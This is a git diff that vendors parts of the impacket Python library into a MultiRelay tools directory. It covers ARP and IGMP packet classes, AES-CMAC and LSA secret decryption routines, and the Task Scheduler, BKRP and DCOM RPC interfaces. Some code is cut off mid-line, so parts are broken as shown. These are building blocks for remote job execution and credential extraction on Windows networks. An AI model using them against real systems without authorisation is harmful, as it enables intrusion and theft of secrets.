+ def get_igmp_group(self):
+ return self.get_long(4)
+
+ def set_igmp_group(self, aValue):
+ self.set_long(4, aValue)
+
+ def get_header_size(self):
+ return 8
+
+ def get_type_name(self, aType):
+ tmp_dict = {0x11:'HOST MEMBERSHIP QUERY ', 0x12:'v1 HOST MEMBERSHIP REPORT ', 0x13:'IGMP DVMRP ', 0x14:' PIM ', 0x16:'v2 HOST MEMBERSHIP REPORT ', 0x17:'HOST LEAVE MESSAGE ', 0x1e:'MTRACE REPLY ', 0X1f:'MTRACE QUERY '}
+ answer = tmp_dict.get(aType, 'UNKNOWN TYPE OR VERSION ')
+ return answer
+
+ def calculate_checksum(self):
+ if self.auto_checksum and (not self.get_igmp_cksum()):
+ self.set_igmp_cksum(self.compute_checksum(self.get_bytes()))
+
+ def __str__(self):
+ tmp_str = 'IGMP: ' + self.get_type_name(self.get_igmp_type())
+ tmp_str += 'Group: ' + socket.inet_ntoa(struct.pack('!L',self.get_igmp_group()))
+ if self.child():
+ tmp_str += '\n' + str(self.child())
+ return tmp_str
+
+
+
+class ARP(Header):
+ ethertype = 0x806
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 7)
+ if aBuffer:
+ self.load_header(aBuffer)
+
+ def get_ar_hrd(self):
+ return self.get_word(0)
+
+ def set_ar_hrd(self, aValue):
+ self.set_word(0, aValue)
+
+ def get_ar_pro(self):
+ return self.get_word(2)
+
+ def set_ar_pro(self, aValue):
+ self.set_word(2, aValue)
+
+ def get_ar_hln(self):
+ return self.get_byte(4)
+
+ def set_ar_hln(self, aValue):
+ self.set_byte(4, aValue)
+
+ def get_ar_pln(self):
+ return self.get_byte(5)
+
+ def set_ar_pln(self, aValue):
+ self.set_byte(5, aValue)
+
+ def get_ar_op(self):
+ return self.get_word(6)
+
+ def set_ar_op(self, aValue):
+ self.set_word(6, aValue)
+
+ def get_ar_sha(self):
+ tmp_size = self.get_ar_hln()
+ return self.get_bytes().tolist()[8: 8 + tmp_size]
+
+ def set_ar_sha(self, aValue):
+ for i in range(0, self.get_ar_hln()):
+ self.set_byte(i + 8, aValue[i])
+
+ def get_ar_spa(self):
+ tmp_size = self.get_ar_pln()
+ return self.get_bytes().tolist()[8 + self.get_ar_hln(): 8 + self.get_ar_hln() + tmp_size]
+
+ def set_ar_spa(self, aValue):
+ for i in range(0, self.get_ar_pln()):
+ self.set_byte(i + 8 + self.get_ar_hln(), aValue[i])
+
+ def get_ar_tha(self):
+ tmp_size = self.get_ar_hln()
+ tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln()
+ return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size]
+
+ def set_ar_tha(self, aValue):
+ tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln()
+ for i in range(0, self.get_ar_hln()):
+ self.set_byte(i + tmp_from, aValue[i])
+
+ def get_ar_tpa(self):
+ tmp_size = self.get_ar_pln()
+ tmp_from = 8 + ( 2 * self.get_ar_hln()) + self.get_ar_pln()
+ return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size]
+
+ def set_ar_tpa(self, aValue):
+ tmp_from = 8 + (2 * self.get_ar_hln()) + self.get_ar_pln()
+ for i in range(0, self.get_ar_pln()):
+ self.set_byte(i + tmp_from, aValue[i])
+
+ def get_header_size(self):
+ return 8 + (2 * self.get_ar_hln()) + (2 * self.get_ar_pln())
+
+ def get_op_name(self, ar_op):
+ tmp_dict = {1:'REQUEST', 2:'REPLY', 3:'REVREQUEST', 4:'REVREPLY', 8:'INVREQUEST', 9:'INVREPLY'}
+ answer = tmp_dict.get(ar_op, 'UNKNOWN')
+ return answer
+
+ def get_hrd_name(self, ar_hrd):
+ tmp_dict = { 1:'ARPHRD ETHER', 6:'ARPHRD IEEE802', 15:'ARPHRD FRELAY'}
+ answer = tmp_dict.get(ar_hrd, 'UNKNOWN')
+ return answer
+
+
+ def as_hrd(self, anArray):
+ if not anArray:
+ return ''
+ tmp_str = '%x' % anArray[0]
+ for i in range(1, len(anArray)):
+ tmp_str += ':%x' % anArray[i]
+ return tmp_str
+
+ def as_pro(self, anArray):
+ if not anArray:
+ return ''
+ tmp_str = '%d' % anArray[0]
+ for i in range(1, len(anArray)):
+ tmp_str += '.%d' % anArray[i]
+ return tmp_str
+
+ def __str__(self):
+ tmp_op = self.get_ar_op()
+ tmp_str = 'ARP format: ' + self.get_hrd_name(self.get_ar_hrd()) + ' '
+ tmp_str += 'opcode: ' + self.get_op_name(tmp_op)
+ tmp_str += '\n' + self.as_hrd(self.get_ar_sha()) + ' -> '
+ tmp_str += self.as_hrd(self.get_ar_tha())
+ tmp_str += '\n' + self.as_pro(self.get_ar_spa()) + ' -> '
+ tmp_str += self.as_pro(self.get_ar_tpa())
+ if self.child():
+ tmp_str += '\n' + str(self.child())
+ return tmp_str
+
+def example(): #To execute an example, remove this line
+ a = Ethernet()
+ b = ARP()
+ c = Data('Hola loco!!!')
+ b.set_ar_hln(6)
+ b.set_ar_pln(4)
+ #a.set_ip_dst('192.168.22.6')
+ #a.set_ip_src('1.1.1.2')
+ a.contains(b)
+ b.contains(c)
+ b.set_ar_op(2)
+ b.set_ar_hrd(1)
+ b.set_ar_spa((192, 168, 22, 6))
+ b.set_ar_tpa((192, 168, 66, 171))
+ a.set_ether_shost((0x0, 0xe0, 0x7d, 0x8a, 0xef, 0x3d))
+ a.set_ether_dhost((0x0, 0xc0, 0xdf, 0x6, 0x5, 0xe))
+ print("beto %s" % a)
diff --git a/tools/MultiRelay/impacket-dev/impacket/__init__.py b/tools/MultiRelay/impacket-dev/impacket/__init__.py
new file mode 100644
index 0000000..92a5d6b
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/__init__.py
@@ -0,0 +1,25 @@
+# Copyright (c) 2003-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+
+# Set default logging handler to avoid "No handler found" warnings.
+import logging
+try: # Python 2.7+
+ from logging import NullHandler
+except ImportError:
+ class NullHandler(logging.Handler):
+ def emit(self, record):
+ pass
+
+# All modules inside this library MUST use this logger (impacket)
+# It is up to the library consumer to do whatever is wanted
+# with the logger output. By default it is forwarded to the
+# upstream logger
+
+LOG = logging.getLogger(__name__)
+LOG.addHandler(NullHandler())
diff --git a/tools/MultiRelay/impacket-dev/impacket/crypto.py b/tools/MultiRelay/impacket-dev/impacket/crypto.py
new file mode 100644
index 0000000..9760426
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/crypto.py
@@ -0,0 +1,346 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (beto@coresecurity.com)
+#
+# Description:
+# RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt)
+# RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt)
+#
+# NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation
+# (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108)
+#
+# [MS-LSAD] Section 5.1.2
+# [MS-SAMR] Section 2.2.11.1.1
+
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+ from Cryptodome.Cipher import DES, AES
+except Exception:
+ LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex")
+ LOG.error("See https://pypi.org/project/pycryptodomex/")
+from struct import pack, unpack
+from impacket.structure import Structure
+import hmac, hashlib
+from six import b
+
+def Generate_Subkey(K):
+
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + Algorithm Generate_Subkey +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + +
+# + Input : K (128-bit key) +
+# + Output : K1 (128-bit first subkey) +
+# + K2 (128-bit second subkey) +
+# +-------------------------------------------------------------------+
+# + +
+# + Constants: const_Zero is 0x00000000000000000000000000000000 +
+# + const_Rb is 0x00000000000000000000000000000087 +
+# + Variables: L for output of AES-128 applied to 0^128 +
+# + +
+# + Step 1. L := AES-128(K, const_Zero); +
+# + Step 2. if MSB(L) is equal to 0 +
+# + then K1 := L << 1; +
+# + else K1 := (L << 1) XOR const_Rb; +
+# + Step 3. if MSB(K1) is equal to 0 +
+# + then K2 := K1 << 1; +
+# + else K2 := (K1 << 1) XOR const_Rb; +
+# + Step 4. return K1, K2; +
+# + +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ AES_128 = AES.new(K, AES.MODE_ECB)
+
+ L = AES_128.encrypt(bytes(bytearray(16)))
+
+ LHigh = unpack('>Q',L[:8])[0]
+ LLow = unpack('>Q',L[8:])[0]
+
+ K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF
+ K1Low = (LLow << 1) & 0xFFFFFFFFFFFFFFFF
+
+ if (LHigh >> 63):
+ K1Low ^= 0x87
+
+ K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF
+ K2Low = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF
+
+ if (K1High >> 63):
+ K2Low ^= 0x87
+
+ K1 = bytearray(pack('>QQ', K1High, K1Low))
+ K2 = bytearray(pack('>QQ', K2High, K2Low))
+
+ return K1, K2
+
+def XOR_128(N1,N2):
+
+ J = bytearray()
+ for i in range(len(N1)):
+ #J.append(indexbytes(N1,i) ^ indexbytes(N2,i))
+ J.append(N1[i] ^ N2[i])
+ return J
+
+def PAD(N):
+ padLen = 16-len(N)
+ return N + b'\x80' + b'\x00'*(padLen-1)
+
+def AES_CMAC(K, M, length):
+
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + Algorithm AES-CMAC +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + +
+# + Input : K ( 128-bit key ) +
+# + : M ( message to be authenticated ) +
+# + : len ( length of the message in octets ) +
+# + Output : T ( message authentication code ) +
+# + +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + Constants: const_Zero is 0x00000000000000000000000000000000 +
+# + const_Bsize is 16 +
+# + +
+# + Variables: K1, K2 for 128-bit subkeys +
+# + M_i is the i-th block (i=1..ceil(len/const_Bsize)) +
+# + M_last is the last block xor-ed with K1 or K2 +
+# + n for number of blocks to be processed +
+# + r for number of octets of last block +
+# + flag for denoting if last block is complete or not +
+# + +
+# + Step 1. (K1,K2) := Generate_Subkey(K); +
+# + Step 2. n := ceil(len/const_Bsize); +
+# + Step 3. if n = 0 +
+# + then +
+# + n := 1; +
+# + flag := false; +
+# + else +
+# + if len mod const_Bsize is 0 +
+# + then flag := true; +
+# + else flag := false; +
+# + +
+# + Step 4. if flag is true +
+# + then M_last := M_n XOR K1; +
+# + else M_last := padding(M_n) XOR K2; +
+# + Step 5. X := const_Zero; +
+# + Step 6. for i := 1 to n-1 do +
+# + begin +
+# + Y := X XOR M_i; +
+# + X := AES-128(K,Y); +
+# + end +
+# + Y := M_last XOR X; +
+# + T := AES-128(K,Y); +
+# + Step 7. return T; +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ const_Bsize = 16
+ const_Zero = bytearray(16)
+
+ AES_128= AES.new(K, AES.MODE_ECB)
+ M = bytearray(M[:length])
+ K1, K2 = Generate_Subkey(K)
+ n = len(M)//const_Bsize
+
+ if n == 0:
+ n = 1
+ flag = False
+ else:
+ if (length % const_Bsize) == 0:
+ flag = True
+ else:
+ n += 1
+ flag = False
+
+ M_n = M[(n-1)*const_Bsize:]
+ if flag is True:
+ M_last = XOR_128(M_n,K1)
+ else:
+ M_last = XOR_128(PAD(M_n),K2)
+
+ X = const_Zero
+ for i in range(n-1):
+ M_i = M[(i)*const_Bsize:][:16]
+ Y = XOR_128(X, M_i)
+ X = bytearray(AES_128.encrypt(bytes(Y)))
+ Y = XOR_128(M_last, X)
+ T = AES_128.encrypt(bytes(Y))
+
+ return T
+
+def AES_CMAC_PRF_128(VK, M, VKlen, Mlen):
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + AES-CMAC-PRF-128 +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+# + +
+# + Input : VK (Variable-length key) +
+# + : M (Message, i.e., the input data of the PRF) +
+# + : VKlen (length of VK in octets) +
+# + : len (length of M in octets) +
+# + Output : PRV (128-bit Pseudo-Random Variable) +
+# + +
+# +-------------------------------------------------------------------+
+# + Variable: K (128-bit key for AES-CMAC) +
+# + +
+# + Step 1. If VKlen is equal to 16 +
+# + Step 1a. then +
+# + K := VK; +
+# + Step 1b. else +
+# + K := AES-CMAC(0^128, VK, VKlen); +
+# + Step 2. PRV := AES-CMAC(K, M, len); +
+# + return PRV; +
+# + +
+# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ if VKlen == 16:
+ K = VK
+ else:
+ K = AES_CMAC(bytes(bytearray(16)), VK, VKlen)
+
+ PRV = AES_CMAC(K, M, Mlen)
+
+ return PRV
+
+def KDF_CounterMode(KI, Label, Context, L):
+# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256
+# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108
+# Fixed values:
+# 1. h - The length of the output of the PRF in bits, and
+# 2. r - The length of the binary representation of the counter i.
+# Input: KI, Label, Context, and L.
+# Process:
+# 1. n := [L/h]
+# 2. If n > 2r-1, then indicate an error and stop.
+# 3. result(0):= empty .
+# 4. For i = 1 to n, do
+# a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2)
+# b. result(i) := result(i-1) || K(i).
+# 5. Return: KO := the leftmost L bits of result(n).
+ h = 256
+ r = 32
+
+ n = L // h
+
+ if n == 0:
+ n = 1
+
+ if n > (pow(2,r)-1):
+ raise Exception("Error computing KDF_CounterMode")
+
+ result = b''
+ K = b''
+
+ for i in range(1,n+1):
+ input = pack('>L', i) + Label + b'\x00' + Context + pack('>L',L)
+ K = hmac.new(KI, input, hashlib.sha256).digest()
+ result = result + K
+
+ return result[:(L//8)]
+
+# [MS-LSAD] Section 5.1.2 / 5.1.3
+class LSA_SECRET_XP(Structure):
+ structure = (
+ ('Length','> 0x01) )
+ OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) )
+ OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) )
+ OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) )
+ OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) )
+ OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) )
+ OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) )
+ OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) )
+
+ for i in range(8):
+ OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
+
+ return b("".join(OutputKey))
+
+def decryptSecret(key, value):
+ # [MS-LSAD] Section 5.1.2
+ plainText = b''
+ key0 = key
+ for i in range(0, len(value), 8):
+ cipherText = value[:8]
+ tmpStrKey = key0[:7]
+ tmpKey = transformKey(tmpStrKey)
+ Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+ plainText += Crypt1.decrypt(cipherText)
+ key0 = key0[7:]
+ value = value[8:]
+ # AdvanceKey
+ if len(key0) < 7:
+ key0 = key[len(key0):]
+
+ secret = LSA_SECRET_XP(plainText)
+ return (secret['Secret'])
+
+def encryptSecret(key, value):
+ # [MS-LSAD] Section 5.1.2
+ cipherText = b''
+ key0 = key
+ value0 = pack('.
+# There are test cases for them too.
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+ATSVC_HANDLE = LPWSTR
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE = 0x1
+TASK_FLAG_DELETE_WHEN_DONE = 0x2
+TASK_FLAG_DISABLED = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE = 0x10
+TASK_FLAG_KILL_ON_IDLE_END = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED = 0x100
+TASK_FLAG_HIDDEN = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME = 0x800
+TASK_FLAG_SYSTEM_REQUIRED = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x2000
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.4 AT_INFO
+class AT_INFO(NDRSTRUCT):
+ structure = (
+ ('JobTime',DWORD),
+ ('DaysOfMonth',DWORD),
+ ('DaysOfWeek',UCHAR),
+ ('Flags',UCHAR),
+ ('Command',LPWSTR),
+ )
+
+class LPAT_INFO(NDRPOINTER):
+ referent = (
+ ('Data',AT_INFO),
+ )
+
+# 2.3.6 AT_ENUM
+class AT_ENUM(NDRSTRUCT):
+ structure = (
+ ('JobId',DWORD),
+ ('JobTime',DWORD),
+ ('DaysOfMonth',DWORD),
+ ('DaysOfWeek',UCHAR),
+ ('Flags',UCHAR),
+ ('Command',LPWSTR),
+ )
+
+class AT_ENUM_ARRAY(NDRUniConformantArray):
+ item = AT_ENUM
+
+class LPAT_ENUM_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data',AT_ENUM_ARRAY),
+ )
+
+# 2.3.5 AT_ENUM_CONTAINER
+class AT_ENUM_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead',DWORD),
+ ('Buffer',LPAT_ENUM_ARRAY),
+ )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.2.1 NetrJobAdd (Opnum 0)
+class NetrJobAdd(NDRCALL):
+ opnum = 0
+ structure = (
+ ('ServerName',ATSVC_HANDLE),
+ ('pAtInfo', AT_INFO),
+ )
+
+class NetrJobAddResponse(NDRCALL):
+ structure = (
+ ('pJobId',DWORD),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.5.2.2 NetrJobDel (Opnum 1)
+class NetrJobDel(NDRCALL):
+ opnum = 1
+ structure = (
+ ('ServerName',ATSVC_HANDLE),
+ ('MinJobId', DWORD),
+ ('MaxJobId', DWORD),
+ )
+
+class NetrJobDelResponse(NDRCALL):
+ structure = (
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.5.2.3 NetrJobEnum (Opnum 2)
+class NetrJobEnum(NDRCALL):
+ opnum = 2
+ structure = (
+ ('ServerName',ATSVC_HANDLE),
+ ('pEnumContainer', AT_ENUM_CONTAINER),
+ ('PreferedMaximumLength', DWORD),
+ ('pResumeHandle', DWORD),
+ )
+
+class NetrJobEnumResponse(NDRCALL):
+ structure = (
+ ('pEnumContainer', AT_ENUM_CONTAINER),
+ ('pTotalEntries', DWORD),
+ ('pResumeHandle',LPDWORD),
+ ('ErrorCode',ULONG),
+ )
+
+# 3.2.5.2.4 NetrJobGetInfo (Opnum 3)
+class NetrJobGetInfo(NDRCALL):
+ opnum = 3
+ structure = (
+ ('ServerName',ATSVC_HANDLE),
+ ('JobId', DWORD),
+ )
+
+class NetrJobGetInfoResponse(NDRCALL):
+ structure = (
+ ('ppAtInfo', LPAT_INFO),
+ ('ErrorCode',ULONG),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (NetrJobAdd,NetrJobAddResponse ),
+ 1 : (NetrJobDel,NetrJobDelResponse ),
+ 2 : (NetrJobEnum,NetrJobEnumResponse ),
+ 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):
+ netrJobAdd = NetrJobAdd()
+ netrJobAdd['ServerName'] = serverName
+ netrJobAdd['pAtInfo'] = atInfo
+ return dce.request(netrJobAdd)
+
+def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):
+ netrJobDel = NetrJobDel()
+ netrJobDel['ServerName'] = serverName
+ netrJobDel['MinJobId'] = minJobId
+ netrJobDel['MaxJobId'] = maxJobId
+ return dce.request(netrJobDel)
+
+def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff):
+ netrJobEnum = NetrJobEnum()
+ netrJobEnum['ServerName'] = serverName
+ netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer
+ netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength
+ return dce.request(netrJobEnum)
+
+def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):
+ netrJobGetInfo = NetrJobGetInfo()
+ netrJobGetInfo['ServerName'] = serverName
+ netrJobGetInfo['JobId'] = jobId
+ return dce.request(netrJobGetInfo)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py
new file mode 100644
index 0000000..15a93bb
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py
@@ -0,0 +1,127 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-BKRP] Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+# ToDo:
+# [ ] 2.2.2 Client-Side-Wrapped Secret
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin, string_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+BACKUPKEY_BACKUP_GUID = string_to_bin("7F752B10-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin("7FE94D50-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin("018FF48A-EABA-40C6-8F6D-72370240E967")
+BACKUPKEY_RESTORE_GUID = string_to_bin("47270C64-2FC7-499B-AC5B-0E37CDCE899A")
+
+################################################################################
+# STRUCTURES
+################################################################################
+class BYTE_ARRAY(NDRUniConformantArray):
+ item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', BYTE_ARRAY),
+ )
+
+# 2.2.4.1 Rc4EncryptedPayload Structure
+class Rc4EncryptedPayload(Structure):
+ structure = (
+ ('R3', '32s=""'),
+ ('MAC', '20s=""'),
+ ('SID', ':', RPC_SID),
+ ('Secret', ':'),
+ )
+
+# 2.2.4 Secret Wrapped with Symmetric Key
+class WRAPPED_SECRET(Structure):
+ structure = (
+ ('SIGNATURE', ' 0 THEN
+# PRINT Name of the method is rgBstrNames[0]
+# PRINT Parameters to above method are following
+# FOR Y = 1 to pcNames -1
+# PRINT rgBstrNames[Y]
+# END FOR
+# END IF
+# END FOR i
+# ENDIF
+def enumerateMethods(iInterface):
+ methods = dict()
+ typeInfoCount = iInterface.GetTypeInfoCount()
+ if typeInfoCount['pctinfo'] == 0:
+ LOG.error('Automation Server does not support type information for this object')
+ return {}
+ iTypeInfo = iInterface.GetTypeInfo()
+ iTypeAttr = iTypeInfo.GetTypeAttr()
+ for x in range(iTypeAttr['ppTypeAttr']['cFuncs']):
+ funcDesc = iTypeInfo.GetFuncDesc(x)
+ names = iTypeInfo.GetNames(funcDesc['ppFuncDesc']['memid'], 255)
+ print(names['rgBstrNames'][0]['asData'])
+ funcDesc.dump()
+ print('='*80)
+ if names['pcNames'] > 0:
+ name = names['rgBstrNames'][0]['asData']
+ methods[name] = {}
+ for param in range(1, names['pcNames']):
+ methods[name][names['rgBstrNames'][param]['asData']] = ''
+ if funcDesc['ppFuncDesc']['elemdescFunc'] != NULL:
+ methods[name]['ret'] = funcDesc['ppFuncDesc']['elemdescFunc']['tdesc']['vt']
+
+ return methods
+
+def checkNullString(string):
+ if string == NULL:
+ return string
+
+ if string[-1:] != '\x00':
+ return string + '\x00'
+ else:
+ return string
+
+class ITypeComp(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self,interface)
+ self._iid = IID_ITypeComp
+
+class ITypeInfo(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self,interface)
+ self._iid = IID_ITypeInfo
+
+ def GetTypeAttr(self):
+ request = ITypeInfo_GetTypeAttr()
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
+
+ def GetTypeComp(self):
+ request = ITypeInfo_GetTypeComp()
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return ITypeComp(INTERFACE(self.get_cinstance(), ''.join(resp['ppTComp']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+ def GetFuncDesc(self, index):
+ request = ITypeInfo_GetFuncDesc()
+ request['index'] = index
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
+
+ def GetNames(self, memid, cMaxNames=10):
+ request = ITypeInfo_GetNames()
+ request['memid'] = memid
+ request['cMaxNames'] = cMaxNames
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
+
+ def GetDocumentation(self, memid, refPtrFlags=15):
+ request = ITypeInfo_GetDocumentation()
+ request['memid'] = memid
+ request['refPtrFlags'] = refPtrFlags
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
+
+
+class IDispatch(IRemUnknown2):
+ def __init__(self, interface):
+ IRemUnknown2.__init__(self,interface)
+ self._iid = IID_IDispatch
+
+ def GetTypeInfoCount(self):
+ request = IDispatch_GetTypeInfoCount()
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return resp
+
+ def GetTypeInfo(self):
+ request = IDispatch_GetTypeInfo()
+ request['iTInfo'] = 0
+ request['lcid'] = 0
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ return ITypeInfo(INTERFACE(self.get_cinstance(), ''.join(resp['ppTInfo']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+ def GetIDsOfNames(self, rgszNames, lcid = 0):
+ request = IDispatch_GetIDsOfNames()
+ request['riid'] = IID_NULL
+ for name in rgszNames:
+ tmpName = LPOLESTR()
+ tmpName['Data'] = checkNullString(name)
+ request['rgszNames'].append(tmpName)
+ request['cNames'] = len(rgszNames)
+ request['lcid'] = lcid
+ resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
+ IDs = list()
+ for id in resp['rgDispId']:
+ IDs.append(id)
+
+ return IDs
+
+ def Invoke(self, dispIdMember, lcid, dwFlags, pDispParams, cVarRef, rgVarRefIdx, rgVarRef):
+ request = IDispatch_Invoke()
+ request['dispIdMember'] = dispIdMember
+ request['riid'] = IID_NULL
+ request['lcid'] = lcid
+ request['dwFlags'] = dwFlags
+ request['pDispParams'] = pDispParams
+ request['cVarRef'] = cVarRef
